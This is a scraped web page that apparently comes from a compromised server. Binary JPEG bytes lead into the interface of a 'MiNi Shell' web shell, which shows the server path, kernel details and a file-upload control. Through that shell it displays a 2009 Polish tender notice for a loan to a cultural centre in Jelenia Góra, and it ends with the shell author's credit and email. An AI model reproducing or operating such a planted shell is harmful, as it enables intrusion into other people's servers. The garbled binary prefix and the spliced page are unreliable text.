JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/176782-N-2009.html

<p class="kh_header"><b>Jelenia Góra: Udzielenie promesy i kredytu w wysokości 1640000 zł na częściowe finansowanie projektu Spotkania- tradycja, kultura i codzienność na czesko- polskim pograniczu realizowanego ze środków dotacji unijnych w ramach programu Europejskiej Współpracy Transgranicznej Republika Czeska- Rzeczpospolita Polska 2007- 2013</b><br>
<b>Numer ogłoszenia: 176782 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Dom Kultury "Muflon" , ul. Cieplicka 172, 58-570 Jelenia Góra, woj. dolnośląskie, tel. 075 7553770, faks 075 7553770.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muflon.sobieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie promesy i kredytu w wysokości 1640000 zł na częściowe finansowanie projektu Spotkania- tradycja, kultura i codzienność na czesko- polskim pograniczu realizowanego ze środków dotacji unijnych w ramach programu Europejskiej Współpracy Transgranicznej Republika Czeska- Rzeczpospolita Polska 2007- 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
1.1. udzielenie promesy kredytu o wartości 1640000,00 zł (słownie: jeden milion sześćset czterdzieści tysięcy zł) na częściowe sfinansowanie projektu pn. Spotkania - tradycja, kultura i codzienność na czesko-polskim pograniczu realizowanego ze środków unijnych w ramach programu Europejskiej Współpracy Transgranicznej Republika Czeska - Rzeczpospolita Polska 2007-2013. Projekt składa się z części inwestycyjnej i programowej. W zakresie zadania inwestycyjnego w latach 2010-2011 przeprowadzona zostanie modernizacja sali widowiskowej wraz z zapleczem Miejskiego Domu Kultury Muflon, natomiast część programowa realizowana będzie w latach 2010-2013. 
(Wniosek o dotację zostanie złożony do 30.06.2009r.)
1.2. udzielenie kredytu o wartości 1640000,00 zł,  pod warunkiem:
- uzyskania przez Zamawiającego dotacji unijnej na projekt Spotkania - tradycja, kultura i codzienność na czesko-polskim pograniczu.2.	Okres kredytowania od 2010r. do 2013 r., tj.:
a) czerwiec 2010 r. do październik 2011 r. - karencja w spłacie kredytu,
b)lipiec 2010 r. do październik 2013 r. - spłata odsetek od wykorzystanego kredytu do 25 dnia następnego miesiąca po miesiącu otrzymania pierwszej transzy kredytu, w okresach miesięcznych, 
c)październik 2011 r. do październik 2013 r. - spłata kapitału po upływie okresu karencji  w ratach półrocznych,
d)czerwiec 2010r. do czerwiec 2012 - płatność rat kredytu.  

3.Terminy przekazania środków :
Przewiduje się uruchomienie kredytu w ośmiu  transzach.
Określenie wartości wypłaty kredytu oraz termin postawienia go do dyspozycji Zamawiającego nastąpi poprzez złożenie przez Zamawiającego zapotrzebowania na środki (wzór zapotrzebowania na środki będzie stanowić załącznik do umowy kredytowej). Rozliczenie wydatków na zadania, na które zaciągany jest kredyt nastąpi w  terminie do 31 marca  2013 roku.

I rata - data płatności raty kredytu 30.06.2010, kwota raty 60000, termin spłaty kapitału 10/2011
II rata - data płatności raty kredytu 30.10.2010, kwota raty 338000, termin spłaty kapitału 10/2011
III rata - data płatności raty kredytu 30.11.2010, kwota raty 212000, termin spłaty kapitału 10/2011
IV rata - data płatności raty kredytu 29.02.2011, kwota raty 400000, termin spłaty kapitału 04/2012
V rata - data płatności raty kredytu 30.03.2011, kwota raty 388000, termin spłaty kapitału 04/2012
VI rata - data płatności raty kredytu 30.06.2011, kwota raty 81000, termin spłaty kapitału 10/2012
VII rata - data płatności raty kredytu 29.02.2012, kwota raty 80000, termin spłaty kapitału 04/2013
VII rata - data płatności raty kredytu 30.06.2012, kwota raty 81000, termin spłaty kapitału 10/20113

4.Podane terminy udzielenia i spłaty kredytu mają charakter warunkowy, uzależniony od planowanej realizacji inwestycji. Terminy mogą ulec przesunięciu w przypadku przesunięcia terminu przyznania dotacji unijnej w ramach EWT, jak i realizacji inwestycji. W takim przypadku zmiany terminów zostaną wprowadzone do umowy stosownym aneksem.

5.Zamawiający zastrzega sobie prawo unieważnienia postępowania o udzielenie zamówienia w przypadku wystąpienia istotnej zmiany okoliczności powodującej, że prowadzenie postępowania lub wykonanie zamówienia nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć.

6.Zamawiający nie dopuszcza możliwości pobierania prowizji i opłat za możliwą przedterminową spłatę kredytu.

7.Rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w walucie PLN.


8.Formę zabezpieczenia kredytu stanowi weksel in blanco wraz z deklaracją wekslową na sumę wekslową równą wielkości udzielonego kredytu wraz z należnymi odsetkami i prowizją.
9.Cena udzielenia promesy kredytu nie może być wyższa niż 0,5% wartości kredytu.

10.Pożądany termin realizacji zamówienia: 
- wydania promesy na udzielenie kredytu: do dnia 23.06.2009r.
- podpisania umowy kredytowej  - do dnia 31.05.2010 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.spełniają wymogi określone w art. 22 ustawy PZP oraz nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 wymienionej ustawy,
2. potwierdzą posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3. potwierdzą udzielenie innym podmiotom minimum trzech kredytów w wysokości co najmniej 1500000 PLN ( słownie: jeden milion pięćset tysięcy zł.) , w okresie trzech ostatnich lat, a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy -  w tym okresie,
4.potwierdzą uzyskanie dodatniego wyniku finansowego netto za 2008 rok..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca zobowiązany jest do złożenia następujących oświadczeń i dokumentów:
1.Wypełnionego i podpisanego (Wzoru oferty)- załącznik nr 1 do SIWZ.
2.Koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem 
3.Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.Wykazu trzech wykonanych usług w zakresie udzielania kredytów w wysokości  co najmniej 1500000 PLN każdy, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wykaz powinien zawierać przedmiot usługi, odbiorcę, datę wykonania i wartość usługi. Wykonawca zobowiązany jest dołączyć do wykazu dokumenty potwierdzające, że usługi wykonano  należycie.
5.Stosownego pełnomocnictwa w sytuacjach, w których uprawnienie do podpisania oferty nie wynika z zapisu we właściwym rejestrze, o którym mowa w pkt. 3.
6.Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu  (wg załącznika nr 2 do SIWZ).
7. Akceptacji istotnych postanowień umowy kredytu  w wysokości  1640000 PLN ( słownie: jeden milion sześćset czterdzieści tysięcy zł.) na częściowe sfinansowanie projektu pn. Spotkania - tradycja, kultura i codzienność na czesko-polskim pograniczu - załącznik nr 3 do SIWZ.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 3,  składa:
a) dokumenty wystawione zgodnie z prawem tego kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
- nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenia społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienia odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
-  nie orzeczono wobec niego zakazu ubiegania się o zamówienie (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
b) zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy PZP (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się wyżej wymaganych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,

Zgodnie z art. 23 ust.1 ustawy PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. 
W w/w przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
Wykonawcy ubiegający się wspólnie o zamówienie muszą dołączyć do oferty odrębnie dokumenty zawarte w punktach 2-3 oraz 6.
Dokumenty, o których mowa w punktach 1  oraz 6-7  muszą być przedłożone w formie oryginałów.
Dokumenty, o których mowa w punktach 2-4 muszą  być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
Dokument, o którym mowa  w punkcie 5  musi być przedłożony w formie oryginału lub kserokopii notarialnie poświadczonej jako zgodnej z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muflon.sobieszow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Dom Kultury Muflon 
58-570 Jelenia Góra ul. Cieplicka 172
sekretariat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 11:00, miejsce: Miejski Dom Kultury Muflon 
58-570 Jelenia Góra ul. Cieplicka 172
sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com